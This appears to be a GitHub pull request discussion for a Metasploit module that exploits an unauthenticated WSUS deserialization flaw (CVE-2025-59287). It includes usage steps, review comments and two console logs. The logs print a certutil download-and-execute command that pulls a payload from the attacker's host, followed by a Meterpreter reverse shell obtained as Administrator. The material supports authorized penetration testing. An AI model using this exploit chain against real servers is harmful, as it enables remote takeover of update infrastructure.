Adds module for unauthenticated deserialization in WSUS (CVE-2025-59287)

[msutovsky-r7]

This PR adds RCE module for unauthenticated deserialization in WSUS - CVE-2025-59287. Work in progress.

WSUS provides features for managing and distributing updates through a management console.
The CVE-2025-59287 is a remote code execution vulnerability in
this component that allows an unauthenticated attacker to create a specially crafted event that gets unsafely deserialized upon server sync.
One way to run synchronization is to open the Windows Server Update Service app,
the other is to run the following command from PowerShell:

(Get-WsusServer).GetSubscription().GetLastSynchronizationInfo()

Verification Steps

1. Setup WSUS on target server
2. Do: use exploit/windows/http/wsus_deserialization_rce
3. Do: set RHOSTS [target IP]
4. Do: set LHOST [attacker IP]
5. Do: set LPORT [attacker port]
6. Do: run

Options

Scenarios

msf exploit(windows/http/wsus_deserialization_rce) > run verbose=true
[*] Command to run on remote host: certutil -urlcache -f http://192.168.3.7:8080/g7dX6dKZEs4KZYEuEJH2KQ %TEMP%\nYFKgDXL.exe & start /B %TEMP%\nYFKgDXL.exe
[*] Fetch handler listening on 192.168.3.7:8080
[*] HTTP server started
[*] Adding resource /g7dX6dKZEs4KZYEuEJH2KQ
[*] Started reverse TCP handler on 192.168.3.7:4444 
[*] Getting server ID
[*] Getting authentication cookie
[*] Getting reporting cookie
[*] Trying to create malicious event
[*] Created malicious event, now waiting for WSUS to sync
[*] Client 10.5.132.161 requested /g7dX6dKZEs4KZYEuEJH2KQ
[*] Sending payload to 10.5.132.161 (Microsoft-CryptoAPI/10.0)
[*] Client 10.5.132.161 requested /g7dX6dKZEs4KZYEuEJH2KQ
[*] Sending payload to 10.5.132.161 (CertUtil URL Agent)
[*] Sending stage (230982 bytes) to 10.5.132.161
[*] Meterpreter session 1 opened (192.168.3.7:4444 -> 10.5.132.161:49984) at 2025-11-04 12:27:00 +0100

meterpreter > sysinfo
Computer        : WIN2022__63DA
OS              : Windows Server 2022 (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN2022__63DA\Administrator

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[jvoisin]

Wow, that's a very clean module, kudos!

[jvoisin]

Why 900 seconds specifically?

[msutovsky-r7]

No specific reason, wait here can be longer depending on the server - 900 is for debugging purpose.

[jvoisin]

Why crash? This is a deserialization-based RCE, so it shouldn't crash, ever, shouldn't it?

[msutovsky-r7]

It could, but the module basically creates event that gets deserialized every time that WSUS sync takes place, meaning the payload stays there and it's causing synchronization to fail. So it basically crashes synchronization, which then gets restarted. This is what I've seen/debug while testing.

[jvoisin]

Why SCREEN_EFFECTS?

[msutovsky-r7]

Because when payload runs, it pops cmd, where you can see certutil being used.

[jvoisin]

Can this be randomized?

[msutovsky-r7]

Good question, I'll check.

[dledda-r7]

waiting for this investigation but that's not a blocker

[msutovsky-r7]

The UpdateID could be randomized, other parameters needs to be fixed as different values cause exploit to fail.

[dledda-r7]

I would suggest here to add at least the update number so the people know if it is or is not vulnerable

[dledda-r7]

It would be great to add the MITRE attack metric here

[dledda-r7]

waiting for this investigation but that's not a blocker

[dledda-r7]

msf exploit(windows/http/wsus_deserialization_rce) > run
[*] Command to run on remote host: certutil -urlcache -f http://192.168.3.10:8080/SqHMvLtqAZWhX-2lofXn7w %TEMP%\UCvtZRNV.exe & start /B %TEMP%\UCvtZRNV.exe
[*] Fetch handler listening on 192.168.3.10:8080
[*] HTTP server started
[*] Adding resource /SqHMvLtqAZWhX-2lofXn7w
[*] Started reverse TCP handler on 192.168.3.10:4444 
[*] Getting server ID
[*] Getting authentication cookie
WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used
[*] Sending stage (605075 bytes) to 10.5.135.158
[*] Getting reporting cookie
[*] Trying to create malicious event
[*] Created malicious event, now waiting for WSUS to sync
[*] Meterpreter session 1 opened (192.168.3.10:4444 -> 10.5.135.158:50803) at 2025-11-11 10:36:26 -0500

meterpreter > sysinfo
Computer        : WIN2022__63DA
OS              : Windows Server 2022 (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >